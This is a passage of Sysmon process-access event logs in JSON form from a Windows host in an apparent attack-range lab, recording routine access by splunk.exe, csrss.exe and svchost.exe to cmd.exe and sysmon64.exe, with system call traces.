C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-023A-5F25-0000-001019300500}","SourceProcessId":"4368","SourceThreadId":"3288","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-023B-5F25-0000-001061470500}","TargetProcessId":"4404","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3424,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023B-5F25-0000-001061470500}\r\nTargetProcessId: 4404\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023B-5F25-0000-001061470500}","TargetProcessId":"4404","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3425,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3426,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3427,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3428,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3429,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3430,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3431,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C